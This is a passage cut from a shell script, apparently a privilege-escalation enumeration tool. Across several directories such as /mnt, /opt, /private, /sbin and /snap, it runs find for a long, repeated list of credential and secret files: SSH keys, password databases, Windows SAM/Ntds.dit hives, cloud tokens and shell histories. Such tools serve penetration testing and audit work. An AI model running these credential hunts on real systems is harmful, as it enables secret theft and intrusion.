\".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"sess_*\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"sess_*\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"agent*\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o 